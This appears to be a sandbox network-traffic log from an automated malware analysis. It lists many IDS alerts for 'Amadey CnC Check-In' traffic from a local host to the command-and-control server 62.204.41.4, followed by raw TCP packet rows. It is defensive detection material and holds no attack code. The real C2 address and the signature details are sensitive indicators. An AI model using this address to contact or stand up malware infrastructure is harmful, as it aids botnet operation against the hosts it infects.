                                                                      192.168.2.762.204.41.450189802027700 02/07/23-23:09:15.358033TCP2027700ET TROJAN Amadey CnC Check-In5018980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449787802027700 02/07/23-23:07:25.659773TCP2027700ET TROJAN Amadey CnC Check-In4978780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450218802027700 02/07/23-23:09:22.479535TCP2027700ET TROJAN Amadey CnC Check-In5021880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450402802027700 02/07/23-23:10:09.761332TCP2027700ET TROJAN Amadey CnC Check-In5040280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449995802027700 02/07/23-23:08:23.383016TCP2027700ET TROJAN Amadey CnC Check-In4999580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450111802027700 02/07/23-23:08:54.086078TCP2027700ET TROJAN Amadey CnC Check-In5011180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449700802027700 02/07/23-23:07:03.031561TCP2027700ET TROJAN Amadey CnC Check-In4970080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449759802027700 02/07/23-23:07:17.049971TCP2027700ET TROJAN Amadey CnC Check-In4975980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449889802027700 02/07/23-23:07:52.061130TCP2027700ET TROJAN Amadey CnC Check-In4988980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450005802027700 02/07/23-23:08:25.803187TCP2027700ET TROJAN Amadey CnC Check-In5000580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450087802027700 02/07/23-23:08:47.809633TCP2027700ET TROJAN Amadey CnC Check-In5008780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450378802027700 02/07/23-23:10:03.940156TCP2027700ET TROJAN Amadey CnC Check-In5037880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450026802027700 02/07/23-23:08:30.966267TCP2027700ET TROJAN Amadey CnC Check-In5002680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449988802027700 02/07/23-23:08:21.653564TCP2027700ET TROJAN Amadey CnC Check-In4998880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450255802027700 02/07/23-23:09:33.778377TCP2027700ET TROJAN Amadey CnC Check-In5025580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449823802027700 02/07/23-23:07:34.268183TCP2027700ET TROJAN Amadey CnC Check-In4982380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449979802027700 02/07/23-23:08:19.443584TCP2027700ET TROJAN Amadey CnC Check-In4997980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450451802027700 02/07/23-23:10:23.598729TCP2027700ET TROJAN Amadey CnC Check-In5045180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449832802027700 02/07/23-23:07:36.602000TCP2027700ET TROJAN Amadey CnC Check-In4983280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450246802027700 02/07/23-23:09:31.574488TCP2027700ET TROJAN Amadey CnC Check-In5024680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450442802027700 02/07/23-23:10:21.434131TCP2027700ET TROJAN Amadey CnC Check-In5044280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450054802027700 02/07/23-23:08:39.617227TCP2027700ET TROJAN Amadey CnC Check-In5005480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450184802027700 02/07/23-23:09:14.118143TCP2027700ET TROJAN Amadey CnC Check-In5018480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450397802027700 02/07/23-23:10:08.575838TCP2027700ET TROJAN Amadey CnC Check-In5039780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449893802027700 02/07/23-23:07:53.025577TCP2027700ET TROJAN Amadey CnC Check-In4989380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449922802027700 02/07/23-23:08:03.022275TCP2027700ET TROJAN Amadey CnC Check-In4992280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450369802027700 02/07/23-23:10:01.812383TCP2027700ET TROJAN Amadey CnC Check-In5036980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450470802027700 02/07/23-23:10:28.297773TCP2027700ET TROJAN Amadey CnC Check-In5047080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449851802027700 02/07/23-23:07:42.712679TCP2027700ET TROJAN Amadey CnC Check-In4985180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449804802027700 02/07/23-23:07:29.696240TCP2027700ET TROJAN Amadey CnC Check-In4980480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450227802027700 02/07/23-23:09:24.691350TCP2027700ET TROJAN Amadey CnC Check-In5022780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450423802027700 02/07/23-23:10:14.904732TCP2027700ET TROJAN Amadey CnC Check-In5042380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450061802027700 02/07/23-23:08:41.341687TCP2027700ET TROJAN Amadey CnC Check-In5006180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450274802027700 02/07/23-23:09:38.463286TCP2027700ET TROJAN Amadey CnC Check-In5027480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450070802027700 02/07/23-23:08:43.541726TCP2027700ET TROJAN Amadey CnC Check-In5007080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449794802027700 02/07/23-23:07:27.299792TCP2027700ET TROJAN Amadey CnC Check-In4979480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450073802027700 02/07/23-23:08:44.306614TCP2027700ET TROJAN Amadey CnC Check-In5007380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450156802027700 02/07/23-23:09:05.211996TCP2027700ET TROJAN Amadey CnC Check-In5015680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449950802027700 02/07/23-23:08:09.942679TCP2027700ET TROJAN Amadey CnC Check-In4995080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449766802027700 02/07/23-23:07:19.651200TCP2027700ET TROJAN Amadey CnC Check-In4976680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450128802027700 02/07/23-23:08:58.335870TCP2027700ET TROJAN Amadey CnC Check-In5012880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449775802027700 02/07/23-23:07:22.751531TCP2027700ET TROJAN Amadey CnC Check-In4977580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450468802027700 02/07/23-23:10:27.766831TCP2027700ET TROJAN Amadey CnC Check-In5046880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449849802027700 02/07/23-23:07:42.221380TCP2027700ET TROJAN Amadey CnC Check-In4984980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450042802027700 02/07/23-23:08:36.263611TCP2027700ET TROJAN Amadey CnC Check-In5004280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450394802027700 02/07/23-23:10:07.826263TCP2027700ET TROJAN Amadey CnC Check-In5039480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450312802027700 02/07/23-23:09:47.795938TCP2027700ET TROJAN Amadey CnC Check-In5031280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450385802027700 02/07/23-23:10:05.658909TCP2027700ET TROJAN Amadey CnC Check-In5038580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450303802027700 02/07/23-23:09:45.572466TCP2027700ET TROJAN Amadey CnC Check-In5030380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450045802027700 02/07/23-23:08:37.461652TCP2027700ET TROJAN Amadey CnC Check-In5004580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450017802027700 02/07/23-23:08:28.743485TCP2027700ET TROJAN Amadey CnC Check-In5001780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450366802027700 02/07/23-23:10:01.065650TCP2027700ET TROJAN Amadey CnC Check-In5036680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449747802027700 02/07/23-23:07:14.171173TCP2027700ET TROJAN Amadey CnC Check-In4974780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449877802027700 02/07/23-23:07:49.111852TCP2027700ET TROJAN Amadey CnC Check-In4987780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449712802027700 02/07/23-23:07:05.940453TCP2027700ET TROJAN Amadey CnC Check-In4971280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450283802027700 02/07/23-23:09:40.653335TCP2027700ET TROJAN Amadey CnC Check-In5028380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450414802027700 02/07/23-23:10:12.687095TCP2027700ET TROJAN Amadey CnC Check-In5041480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450201802027700 02/07/23-23:09:18.336544TCP2027700ET TROJAN Amadey CnC Check-In5020180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450331802027700 02/07/23-23:09:52.497858TCP2027700ET TROJAN Amadey CnC Check-In5033180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449896802027700 02/07/23-23:07:53.775433TCP2027700ET TROJAN Amadey CnC Check-In4989680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449915802027700 02/07/23-23:08:01.310915TCP2027700ET TROJAN Amadey CnC Check-In4991580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450163802027700 02/07/23-23:09:06.937703TCP2027700ET TROJAN Amadey CnC Check-In5016380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449714802027700 02/07/23-23:07:06.440544TCP2027700ET TROJAN Amadey CnC Check-In4971480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449910802027700 02/07/23-23:08:00.070255TCP2027700ET TROJAN Amadey CnC Check-In4991080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449809802027700 02/07/23-23:07:30.882146TCP2027700ET TROJAN Amadey CnC Check-In4980980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450196802027700 02/07/23-23:09:17.107942TCP2027700ET TROJAN Amadey CnC Check-In5019680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450109802027700 02/07/23-23:08:53.586754TCP2027700ET TROJAN Amadey CnC Check-In5010980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449773802027700 02/07/23-23:07:22.191273TCP2027700ET TROJAN Amadey CnC Check-In4977380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450137802027700 02/07/23-23:09:00.524989TCP2027700ET TROJAN Amadey CnC Check-In5013780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450333802027700 02/07/23-23:09:52.974040TCP2027700ET TROJAN Amadey CnC Check-In5033380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450305802027700 02/07/23-23:09:46.051156TCP2027700ET TROJAN Amadey CnC Check-In5030580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450392802027700 02/07/23-23:10:07.350927TCP2027700ET TROJAN Amadey CnC Check-In5039280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450210802027700 02/07/23-23:09:20.545993TCP2027700ET TROJAN Amadey CnC Check-In5021080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449868802027700 02/07/23-23:07:46.881014TCP2027700ET TROJAN Amadey CnC Check-In4986880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450428802027700 02/07/23-23:10:16.360693TCP2027700ET TROJAN Amadey CnC Check-In5042880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450191802027700 02/07/23-23:09:15.842999TCP2027700ET TROJAN Amadey CnC Check-In5019180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449837802027700 02/07/23-23:07:38.971375TCP2027700ET TROJAN Amadey CnC Check-In4983780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450168802027700 02/07/23-23:09:09.197666TCP2027700ET TROJAN Amadey CnC Check-In5016880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450165802027700 02/07/23-23:09:07.791157TCP2027700ET TROJAN Amadey CnC Check-In5016580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450456802027700 02/07/23-23:10:24.827371TCP2027700ET TROJAN Amadey CnC Check-In5045680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450300802027700 02/07/23-23:09:44.841607TCP2027700ET TROJAN Amadey CnC Check-In5030080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450147802027700 02/07/23-23:09:03.026189TCP2027700ET TROJAN Amadey CnC Check-In5014780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449883802027700 02/07/23-23:07:50.617719TCP2027700ET TROJAN Amadey CnC Check-In4988380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450421802027700 02/07/23-23:10:14.406004TCP2027700ET TROJAN Amadey CnC Check-In5042180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449863802027700 02/07/23-23:07:45.653673TCP2027700ET TROJAN Amadey CnC Check-In4986380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450286802027700 02/07/23-23:09:41.402786TCP2027700ET TROJAN Amadey CnC Check-In5028680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450029802027700 02/07/23-23:08:31.679572TCP2027700ET TROJAN Amadey CnC Check-In5002980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449820802027700 02/07/23-23:07:33.547735TCP2027700ET TROJAN Amadey CnC Check-In4982080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449958802027700 02/07/23-23:08:11.883807TCP2027700ET TROJAN Amadey CnC Check-In4995880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450102802027700 02/07/23-23:08:51.747853TCP2027700ET TROJAN Amadey CnC Check-In5010280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449817802027700 02/07/23-23:07:32.798708TCP2027700ET TROJAN Amadey CnC Check-In4981780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450243802027700 02/07/23-23:09:30.844574TCP2027700ET TROJAN Amadey CnC Check-In5024380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450338802027700 02/07/23-23:09:54.241583TCP2027700ET TROJAN Amadey CnC Check-In5033880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450065802027700 02/07/23-23:08:42.321938TCP2027700ET TROJAN Amadey CnC Check-In5006580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450411802027700 02/07/23-23:10:11.977609TCP2027700ET TROJAN Amadey CnC Check-In5041180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450019802027700 02/07/23-23:08:29.231063TCP2027700ET TROJAN Amadey CnC Check-In5001980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450464802027700 02/07/23-23:10:26.781066TCP2027700ET TROJAN Amadey CnC Check-In5046480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449886802027700 02/07/23-23:07:51.330001TCP2027700ET TROJAN Amadey CnC Check-In4988680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450055802027700 02/07/23-23:08:39.857527TCP2027700ET TROJAN Amadey CnC Check-In5005580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450233802027700 02/07/23-23:09:26.208391TCP2027700ET TROJAN Amadey CnC Check-In5023380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449935802027700 02/07/23-23:08:06.241910TCP2027700ET TROJAN Amadey CnC Check-In4993580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450171802027700 02/07/23-23:09:10.958890TCP2027700ET TROJAN Amadey CnC Check-In5017180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450441802027700 02/07/23-23:10:21.186453TCP2027700ET TROJAN Amadey CnC Check-In5044180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450085802027700 02/07/23-23:08:47.307738TCP2027700ET TROJAN Amadey CnC Check-In5008580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449843802027700 02/07/23-23:07:40.769584TCP2027700ET TROJAN Amadey CnC Check-In4984380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450263802027700 02/07/23-23:09:35.762539TCP2027700ET TROJAN Amadey CnC Check-In5026380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449757802027700 02/07/23-23:07:16.570116TCP2027700ET TROJAN Amadey CnC Check-In4975780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449876802027700 02/07/23-23:07:48.864985TCP2027700ET TROJAN Amadey CnC Check-In4987680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449873802027700 02/07/23-23:07:48.143493TCP2027700ET TROJAN Amadey CnC Check-In4987380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449702802027700 02/07/23-23:07:03.497685TCP2027700ET TROJAN Amadey CnC Check-In4970280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449948802027700 02/07/23-23:08:09.418495TCP2027700ET TROJAN Amadey CnC Check-In4994880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449698802027700 02/07/23-23:07:02.520211TCP2027700ET TROJAN Amadey CnC Check-In4969880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450098802027700 02/07/23-23:08:50.686542TCP2027700ET TROJAN Amadey CnC Check-In5009880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449830802027700 02/07/23-23:07:35.970669TCP2027700ET TROJAN Amadey CnC Check-In4983080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450016802027700 02/07/23-23:08:28.501580TCP2027700ET TROJAN Amadey CnC Check-In5001680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450454802027700 02/07/23-23:10:24.351476TCP2027700ET TROJAN Amadey CnC Check-In5045480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450207802027700 02/07/23-23:09:19.807802TCP2027700ET TROJAN Amadey CnC Check-In5020780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450276802027700 02/07/23-23:09:38.947586TCP2027700ET TROJAN Amadey CnC Check-In5027680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450467802027700 02/07/23-23:10:27.519527TCP2027700ET TROJAN Amadey CnC Check-In5046780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450230802027700 02/07/23-23:09:25.448061TCP2027700ET TROJAN Amadey CnC Check-In5023080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449807802027700 02/07/23-23:07:30.407498TCP2027700ET TROJAN Amadey CnC Check-In4980780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449978802027700 02/07/23-23:08:19.152480TCP2027700ET TROJAN Amadey CnC Check-In4997880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450052802027700 02/07/23-23:08:39.150060TCP2027700ET TROJAN Amadey CnC Check-In5005280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450348802027700 02/07/23-23:09:56.686065TCP2027700ET TROJAN Amadey CnC Check-In5034880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449866802027700 02/07/23-23:07:46.384765TCP2027700ET TROJAN Amadey CnC Check-In4986680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449860802027700 02/07/23-23:07:44.917311TCP2027700ET TROJAN Amadey CnC Check-In4986080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449777802027700 02/07/23-23:07:23.237313TCP2027700ET TROJAN Amadey CnC Check-In4977780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449955802027700 02/07/23-23:08:11.133835TCP2027700ET TROJAN Amadey CnC Check-In4995580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450240802027700 02/07/23-23:09:30.031560TCP2027700ET TROJAN Amadey CnC Check-In5024080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450151802027700 02/07/23-23:09:04.039199TCP2027700ET TROJAN Amadey CnC Check-In5015180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450062802027700 02/07/23-23:08:41.588091TCP2027700ET TROJAN Amadey CnC Check-In5006280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449850802027700 02/07/23-23:07:42.466685TCP2027700ET TROJAN Amadey CnC Check-In4985080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450279802027700 02/07/23-23:09:39.671696TCP2027700ET TROJAN Amadey CnC Check-In5027980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449945802027700 02/07/23-23:08:08.700275TCP2027700ET TROJAN Amadey CnC Check-In4994580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450434802027700 02/07/23-23:10:19.489029TCP2027700ET TROJAN Amadey CnC Check-In5043480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450345802027700 02/07/23-23:09:55.938392TCP2027700ET TROJAN Amadey CnC Check-In5034580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449767802027700 02/07/23-23:07:19.936780TCP2027700ET TROJAN Amadey CnC Check-In4976780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450368802027700 02/07/23-23:10:01.561612TCP2027700ET TROJAN Amadey CnC Check-In5036880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450250802027700 02/07/23-23:09:32.516213TCP2027700ET TROJAN Amadey CnC Check-In5025080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450457802027700 02/07/23-23:10:25.069012TCP2027700ET TROJAN Amadey CnC Check-In5045780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449856802027700 02/07/23-23:07:43.927943TCP2027700ET TROJAN Amadey CnC Check-In4985680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450161802027700 02/07/23-23:09:06.445124TCP2027700ET TROJAN Amadey CnC Check-In5016180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450072802027700 02/07/23-23:08:44.049738TCP2027700ET TROJAN Amadey CnC Check-In5007280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450167802027700 02/07/23-23:09:08.918959TCP2027700ET TROJAN Amadey CnC Check-In5016780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450256802027700 02/07/23-23:09:34.024543TCP2027700ET TROJAN Amadey CnC Check-In5025680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450078802027700 02/07/23-23:08:45.546416TCP2027700ET TROJAN Amadey CnC Check-In5007880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450266802027700 02/07/23-23:09:36.481027TCP2027700ET TROJAN Amadey CnC Check-In5026680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450355802027700 02/07/23-23:09:58.376240TCP2027700ET TROJAN Amadey CnC Check-In5035580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450269802027700 02/07/23-23:09:37.221380TCP2027700ET TROJAN Amadey CnC Check-In5026980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450006802027700 02/07/23-23:08:26.061962TCP2027700ET TROJAN Amadey CnC Check-In5000680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450358802027700 02/07/23-23:09:59.107326TCP2027700ET TROJAN Amadey CnC Check-In5035880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450447802027700 02/07/23-23:10:22.643400TCP2027700ET TROJAN Amadey CnC Check-In5044780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449840802027700 02/07/23-23:07:40.053784TCP2027700ET TROJAN Amadey CnC Check-In4984080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450177802027700 02/07/23-23:09:12.432080TCP2027700ET TROJAN Amadey CnC Check-In5017780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449751802027700 02/07/23-23:07:15.127198TCP2027700ET TROJAN Amadey CnC Check-In4975180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450444802027700 02/07/23-23:10:21.912071TCP2027700ET TROJAN Amadey CnC Check-In5044480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449708802027700 02/07/23-23:07:04.970651TCP2027700ET TROJAN Amadey CnC Check-In4970880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450088802027700 02/07/23-23:08:48.057973TCP2027700ET TROJAN Amadey CnC Check-In5008880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449968802027700 02/07/23-23:08:14.393779TCP2027700ET TROJAN Amadey CnC Check-In4996880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449761802027700 02/07/23-23:07:17.550184TCP2027700ET TROJAN Amadey CnC Check-In4976180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450009802027700 02/07/23-23:08:26.787937TCP2027700ET TROJAN Amadey CnC Check-In5000980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450342802027700 02/07/23-23:09:55.215790TCP2027700ET TROJAN Amadey CnC Check-In5034280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449942802027700 02/07/23-23:08:07.961390TCP2027700ET TROJAN Amadey CnC Check-In4994280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449853802027700 02/07/23-23:07:43.194714TCP2027700ET TROJAN Amadey CnC Check-In4985380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449764802027700 02/07/23-23:07:18.587959TCP2027700ET TROJAN Amadey CnC Check-In4976480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450253802027700 02/07/23-23:09:33.281756TCP2027700ET TROJAN Amadey CnC Check-In5025380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450431802027700 02/07/23-23:10:18.720532TCP2027700ET TROJAN Amadey CnC Check-In5043180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450075802027700 02/07/23-23:08:44.816817TCP2027700ET TROJAN Amadey CnC Check-In5007580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450164802027700 02/07/23-23:09:07.186122TCP2027700ET TROJAN Amadey CnC Check-In5016480192.168.2.762.204.41.4
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                      Feb 7, 2023 23:07:01.546416998 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.546433926 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546452999 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546467066 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.546471119 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546489954 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546505928 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.546509027 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546528101 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.546529055 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546550035 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546564102 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546583891 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.546583891 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.546590090 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546607971 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.546617985 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546639919 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.546644926 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546672106 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.546673059 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546715021 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.546717882 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546736002 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.546741009 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546761036 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546782017 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546787977 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.546799898 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546818972 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546824932 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.546838999 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546850920 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.546857119 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546876907 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546880960 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.546896935 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546900988 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.546919107 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.546938896 CET4969680192.168.2.762.204.41.4
